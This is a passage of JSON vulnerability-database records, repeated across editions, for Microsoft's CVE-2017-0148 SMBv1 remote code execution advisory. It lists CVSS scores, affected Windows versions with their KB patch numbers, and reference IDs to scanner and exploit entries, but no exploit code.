(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:58:50", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T20:44:44", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3205409", "KB4012215", "KB3213986", "KBMS16-110, 3187754", "KB3210721", "KB4013429", "KB4013198", "KB4012214", "KB3177186", "KB4012213", "KB4012212", "KB3205401", "KB4012598", "KB4012216", "KB3210720", "KB3212646", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:44:44", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T08:48:00", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T08:48:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T08:48:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:48:00", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T11:22:34", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 